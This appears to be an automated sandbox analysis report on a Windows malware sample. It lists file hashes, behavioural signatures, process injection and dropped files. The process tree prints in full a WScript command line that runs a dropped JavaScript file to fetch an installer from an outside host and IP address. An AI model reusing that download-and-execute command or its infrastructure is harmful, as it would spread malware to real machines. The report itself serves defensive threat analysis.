Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07/05/2024, 20:52
Static task
static1
Behavioral task
behavioral1
Sample
21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe
-
Size
184KB
-
MD5
21ae26a9cddd6a91b1fd53eed9ff3dcb
-
SHA1
86986c72ec1f2b23c08b2ab54e67eceb3ab72d93
-
SHA256
e4e59804853999813b55545f0ddb60394f9b02704484f289399ae88b12f3e1ae
-
SHA512
32e1b16c66953b4cc7f17f99e83fd7aceb35d367904c807e8de5f12a58e9053614f3b6ac943afcc2ec949dd47908fc352be58f7db4caf3c2668ed20cac314ed2
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO31:/7BSH8zUB+nGESaaRvoB7FJNndnw
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 6 2012 WScript.exe 8 2012 WScript.exe 10 2012 WScript.exe 12 2480 WScript.exe 13 2480 WScript.exe 15 2912 WScript.exe 16 2912 WScript.exe 18 2020 WScript.exe 19 2020 WScript.exe 22 880 WScript.exe 25 880 WScript.exe 27 880 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3052 2408 WerFault.exe 27 -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2408 wrote to memory of 2012 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 28 PID 2408 wrote to memory of 2012 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 28 PID 2408 wrote to memory of 2012 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 28 PID 2408 wrote to memory of 2012 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 28 PID 2408 wrote to memory of 2480 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 30 PID 2408 wrote to memory of 2480 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 30 PID 2408 wrote to memory of 2480 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 30 PID 2408 wrote to memory of 2480 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 30 PID 2408 wrote to memory of 2912 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 32 PID 2408 wrote to memory of 2912 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 32 PID 2408 wrote to memory of 2912 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 32 PID 2408 wrote to memory of 2912 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 32 PID 2408 wrote to memory of 2020 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 34 PID 2408 wrote to memory of 2020 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 34 PID 2408 wrote to memory of 2020 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 34 PID 2408 wrote to memory of 2020 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 34 PID 2408 wrote to memory of 880 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 36 PID 2408 wrote to memory of 880 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 36 PID 2408 wrote to memory of 880 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 36 PID 2408 wrote to memory of 880 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 36 PID 2408 wrote to memory of 3052 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 40 PID 2408 wrote to memory of 3052 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 40 PID 2408 wrote to memory of 3052 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 40 PID 2408 wrote to memory of 3052 2408 21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\21ae26a9cddd6a91b1fd53eed9ff3dcb_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf20AA.js" http://www.djapp.info/?domain=KZjulqEiEq.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf20AA.exe2⤵
- Blocklisted process makes network request
PID:2012
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf20AA.js" http://www.djapp.info/?domain=KZjulqEiEq.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf20AA.exe2⤵
- Blocklisted process makes network request
PID:2480
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf20AA.js" http://www.djapp.info/?domain=KZjulqEiEq.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf20AA.exe2⤵
- Blocklisted process makes network request
PID:2912
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf20AA.js" http://www.djapp.info/?domain=KZjulqEiEq.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf20AA.exe2⤵
- Blocklisted process makes network request
PID:2020
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf20AA.js" http://www.djapp.info/?domain=KZjulqEiEq.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf20AA.exe2⤵
- Blocklisted process makes network request
PID:880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 4722⤵
- Program crash
PID:3052
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5af14424bd91fa356e225129fe451aacc
SHA14046dc95051bf8382196ff1fec36326c22dc1aae
SHA25626f7df2742be7eae0cecb3954ab69d2f1ad25c6b63a21e3a477ea34dee8301ae
SHA512362068ce189ee00c318b574ebc8fc4f2e09add21f6c79aea8fe2f69ece44c0beaeb6c7fec7297a0b758ea5b8879ab0e9993c74ab262e200e289c05833e734179
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD593c98618e5705589737266367d41e506
SHA16affd8c743fb8a865b7658eab156ac5344a0cada
SHA256918c6938baf739aef1a94bcc38f65871332984eceb86b6fccba36ea9d58ee2bb
SHA512af5ef6024ecaeeab6f33a778d29e9ad43d9e878d8852b12345ad8d389b545f0e6f418bc8639abcb7dcaf9752a1df2b3535765baa307ba67c47329f923c457192
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5625074f5ff9e97dbc4405c57db329647
SHA13450d75cd79e60ca5139732a5ea33bd0ccd581bb
SHA2566364d63b645be289bf0d9a2f5745e47c8f519f0eac710ba08c2ed16701bbacc2
SHA5127ff21df4a170439f493d4603e65e04129444721b22c4c7a665dffff50e782fa4e72ba30362ca441ac8f0d1293e76be2cd20e9ea049d439d6974fd0597c7d1e34
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD50cc9eceb6746b4bf2562fe2d06af67df
SHA1a83801f5193c15ee7cdfcf1d3eb678c4b07edfcf
SHA256f520691e503f030049f1be7b5cadfd5770a851ba30b088315d16b1e0c159e476
SHA5129f9eed63985f88a46602f322eff68f587e46a53997e4b75a00b025a3f6035b75f8f8ec8296f5018c0887fd5e339536290a41821b8a1a2cd35d7e81fa6e3cf4b0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize40KB
MD52c707e60256d9e46193e4f2bbceb96ce
SHA1cc09732813cecf2b77c2ade5bf4b56f60fa1706d
SHA256ba5fdaa074c435d28b61ec59331258081d29af1082920fe86f06a25f2d16def5
SHA512220a72ceda8f6ea0a5bbbb0dde947f4eb15b6cc87a5f14fff56c4b96f36b03b8635d73927809afbfbdb8b8e8ea611d797fc1cddc8b4854bb3719a865da57fc8e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize6KB
MD5f353220a00b1b93885c248a18c9fc582
SHA184900687b9d99d521d86328f3290a600021ce3d9
SHA2569661ff4a24c520900ea5b83eacd1e626da999a8ba58cdde72528e7b8d16a57e8
SHA512d129232d6390b5df36b4c3d6fea1b2f400c9488098aa543c9155467bee74467f4b6b1765c489415e8030f6a4b458766f0390ec2e6f4e2e1e76564c501f2f0e95
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
Filesize40KB
MD5adbaca7ff5ed61ba6efc1c09af2f99a1
SHA11de86e7a672b30aee2406395e0521675a185e77b
SHA256e2b186709c90e832bf1821c75a5cb62acb2143a3901c00513532419279e91db6
SHA512bff1667ca917c109fb6a94dbb8527a27579ae3ae71b706e8bee91e0ade9b861935ba357c9bc9a63a18c10c42bcafa473074160f6a34e24d14ca709898d6753f6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
Filesize40KB
MD5695a1339a7854c72e176e36bc3a5f741
SHA1307122e776db7511b3f916f9fd333bccc8000626
SHA256c5c2b6f24d3b9d16804b7a765cfb2fddf6099a61f4bae4ce906a09f016d41cd2
SHA5123bb6bba94dac2e4bc7d5f2fc92c24155a052744356e992d7fcbbb26d130e11d9b43785f6fac1e4c270ffc0ec6e919d7e7bdf5b53e5bce04b3fbb54f07325f13c
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
175B
MD5bc6041d6be92d0d640448ed1302ef0a5
SHA1d09fd27f32a9dea96f20484da6bd40e8ef811508
SHA25689cbe2c7112b201d7772c61814a3437065c79d3ee3d6ade55c76a4443c83ee97
SHA51267a9e9e29f5531ce9de1319d5a849ced32732430e93811b37652d23cfdb8cdfb962648ee444aaf6e255b7f2bfce014cb9ffedfd6a5eb2eb43c68c43975ca0026